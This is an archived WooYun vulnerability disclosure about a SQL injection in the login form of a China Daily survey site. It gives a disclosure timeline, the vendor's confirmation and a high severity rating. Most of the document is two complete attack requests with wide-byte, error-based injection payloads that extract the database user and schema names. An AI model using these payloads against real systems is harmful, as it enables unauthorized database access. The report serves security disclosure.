乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-16: 细节已通知厂商并且等待厂商处理中 2015-06-18: 厂商已经确认,细节仅向厂商公开 2015-06-28: 细节向核心白帽子及相关领域专家公开 2015-07-08: 细节向普通白帽子公开 2015-07-18: 细节向实习白帽子公开 2015-08-02: 细节向公众公开
POST /survey/admin/login.shtml HTTP/1.1Content-Length: 271Content-Type: application/x-www-form-urlencodedReferer: http://app1.chinadaily.com.cn:80/survey/v.php?mmid=841Cookie: PHPSESSID=6unetdl3m7kpljv1jtsaas7me3Host: app1.chinadaily.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*account==%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&action=login&password=g00dPa%24%24w0rD&Submit=%e7%99%bb%20%e5%bd%95
库:
POST /survey/admin/login.shtml HTTP/1.1Content-Length: 277Content-Type: application/x-www-form-urlencodedReferer: http://app1.chinadaily.com.cn:80/survey/v.php?mmid=841Cookie: PHPSESSID=6unetdl3m7kpljv1jtsaas7me3Host: app1.chinadaily.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*account==%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&action=login&password=g00dPa%24%24w0rD&Submit=%e7%99%bb%20%e5%bd%95
40个库,手动测试就不深入了~
危害等级:高
漏洞Rank:20
确认时间:2015-06-18 14:51
十分感谢,努力修复中
暂无